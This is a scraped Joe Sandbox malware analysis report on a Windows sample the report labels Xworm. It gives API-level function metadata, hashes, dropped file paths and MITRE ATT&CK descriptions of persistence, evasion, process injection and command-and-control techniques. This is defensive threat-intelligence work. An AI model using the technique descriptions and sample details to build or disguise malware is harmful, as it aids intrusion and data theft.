:, xrefs: 00405A39

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CharNext
String ID: :$\
API String ID: 3213498283-1166558509
Opcode ID: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
Instruction ID: 200156b63a22a8533bc35d37f5bbbd655cb9a28a0338e71d1743e581b4aecdbb
Opcode Fuzzy Hash: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
Instruction Fuzzy Hash: B2F09651B04F546AFB3292B40CD4B675B88CB95761F18867BD540B62C2C27C48504FAA

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
Instruction ID: 70c5dabd3ba5e8ff49a6b9f2e1e1e4e729e8b40939c30b800ff2ff7c816f6e1a
Opcode Fuzzy Hash: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
Instruction Fuzzy Hash: 91216BB1944208BEEF06AFA4DD8AAAD7FB5EB44304F10447EF501B61D1C7B88640DB18

Function 004048C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
wsprintfA.USER32 ref: 0040496A
SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D

Strings

%u.%u%s%s, xrefs: 0040494C

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: b425e8249d3dbb4dd4c8837ae6e98a0b85a15bc17ec9f863b28494cdb090daaf
Instruction ID: 7420f511cdb836142555688b3451de143ce73197971a19baf3312835e895797a
Opcode Fuzzy Hash: b425e8249d3dbb4dd4c8837ae6e98a0b85a15bc17ec9f863b28494cdb090daaf
Instruction Fuzzy Hash: 0411DA736441283BEB10657D9C45EAF3298DB86374F260237FA26F31D1E979CC2251E8

Function 00402C2E Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: f81053263e66775c86f22c9e7281053eb29660a1472c423ac1bc7bfee237aa75
Instruction ID: 0ef75652e5200b2c3979a726b87f5b44e9bd6decc27dd8d038d5566faf8c77c7
Opcode Fuzzy Hash: f81053263e66775c86f22c9e7281053eb29660a1472c423ac1bc7bfee237aa75
Instruction Fuzzy Hash: CC119A32504109FBEF129F90CF09B9E7B6DEB14380F204032BD45B61E0E7B59E11ABA8

Function 004055DA Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,00000000), ref: 0040561D
GetLastError.KERNEL32 ref: 00405631
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405646
GetLastError.KERNEL32 ref: 00405650

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction ID: 74ab278e8dc0014e3bb1a2534afc1f4e11ab1799ac02ec3fccaeb9b03a53458b
Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction Fuzzy Hash: 42011A71C00619EADF009FA1D944BEFBBB8EF14354F00843AD549B6290D77996498FA9

Function 00402D60 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00402F3E,00000001), ref: 00402D73
GetTickCount.KERNEL32 ref: 00402D91
CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
ShowWindow.USER32(00000000,00000005), ref: 00402DBC

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
Instruction ID: 59a190b5ca5e41810c33fe67e91fb44ed42669482eb3396a028566c2b75ef85f
Opcode Fuzzy Hash: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
Instruction Fuzzy Hash: 8DF05831941620EBC610AB24BE4CA8E7B74BB04B12711897BF449B11F4CB7C4C828B9C

Function 00405A73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA

Part of subcall function 00405A1E: CharNextA.USER32(?,00000000,?,?,004015CA,00000000,000000F0), ref: 00405A2C
Part of subcall function 00405A1E: CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A31
Part of subcall function 00405A1E: CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A45

lstrlenA.KERNEL32(007A0950,00000000,007A0950,007A0950,?,?,?,004057D5,?), ref: 00405AC6
GetFileAttributesA.KERNEL32(007A0950,007A0950,007A0950,007A0950,007A0950,007A0950,00000000,007A0950,007A0950,?,?,?,004057D5,?), ref: 00405AD6

Strings

Pz, xrefs: 00405A79

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: Pz
API String ID: 3248276644-4075803849
Opcode ID: b64babd179512e018bab78e554f82c4544fddaf0e52df0fe8d8ef1bdd38ac3b2
Instruction ID: 48b42070403af27e20b1f5acdd7358d009e8e21f6fdf4bd1af3726bdd8170272
Opcode Fuzzy Hash: b64babd179512e018bab78e554f82c4544fddaf0e52df0fe8d8ef1bdd38ac3b2
Instruction Fuzzy Hash: 2AF0A421215D6216D622323A1C89A9F1A58CEC7364709073FF866B12D3EA3C89439DAE

Function 00405088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004050B7
CallWindowProcA.USER32(?,?,?,?), ref: 00405108

Part of subcall function 004040C7: SendMessageA.USER32(?,?,00000000,00000000), ref: 004040D9

Strings

, xrefs: 00405098

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
Instruction ID: b4a086d39c893e0b6e30c02e44c042f184afa5b73794f50f798247e01a256ddd
Opcode Fuzzy Hash: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
Instruction Fuzzy Hash: 5C018471200609EFDF204F11DD84A6F3665EB84314F208037F605B65D1CB7A8C52AFAD

Function 00405ED4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,007A1EE0,(y,?,-000010B8,-000010B8,00000002,-000010B8,?,00406118,80000002), ref: 00405F1A
RegCloseKey.ADVAPI32(?,?,00406118,80000002,Software\Microsoft\Windows\CurrentVersion,-000010B8,007A1EE0,007A1EE0,?,0079ED28), ref: 00405F25

Strings

(y, xrefs: 00405EF9

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CloseQueryValue
String ID: (y
API String ID: 3356406503-255812342
Opcode ID: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
Instruction ID: 2e4321f520f0c42760b8dd6c663e9e781067c597ec393d4c632fa8beed11a635
Opcode Fuzzy Hash: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
Instruction Fuzzy Hash: 3B019A7250020AAADF22CF20CC09FDB3BA8EF55360F00442AF904A2190D278CA54CFA8

Function 00405BB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405BC9
GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BE3

Strings

nsa, xrefs: 00405BC0

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction ID: d190f65444f006a88ba75eae1d2615f44ee573feb2fe82d01cd284afd59f947a
Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction Fuzzy Hash: C1F082363042086BDB109F56DD04B9B7BA9DFA1750F10803BFA489A280D6B4E9558758

Function 00405AEB Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B13
CharNextA.USER32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B24
lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B2D

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
Instruction ID: c1544da0d971e4a519e78892e838bc28cfb462c10397de1a7bf1af1224e2ff03
Opcode Fuzzy Hash: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
Instruction Fuzzy Hash: 9CF06232105418BFC712DFA5DD40D9EBBB8DF56250B2540BAE840F7251D674FE019BA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report H33UCslPzv.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif

C:\Users\user\AppData\Local\Temp\nsi68DA.tmp

C:\Users\user\AppData\Local\Temp\nsj6A14.tmp

C:\Users\user\AppData\Local\Temp\nsj6B4D.tmp

C:\Users\user\AppData\Local\Temp\nsm659B.tmp

C:\Users\user\AppData\Local\Temp\nsn6772.tmp

C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll

C:\Users\user\AppData\Local\Temp\unscorified\Anciennitetsmssige.Syn

C:\Users\user\AppData\Local\Temp\unscorified\Farisismen24.opt

C:\Users\user\AppData\Local\Temp\unscorified\Louisianians31.mon

C:\Users\user\AppData\Local\Temp\unscorified\Pacinian\Anciennitetsmssige.Syn

C:\Users\user\AppData\Local\Temp\unscorified\Pacinian\Faldbyde.Skr

C:\Users\user\AppData\Local\Temp\unscorified\Pacinian\Farisismen24.opt

Windows Analysis Report
H33UCslPzv.exe

Function 00403248 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 00405252 Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Function 004057B5 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159
filestringCOMMON

Function 00403BA7 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 0040380A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402DC4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 0040600F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

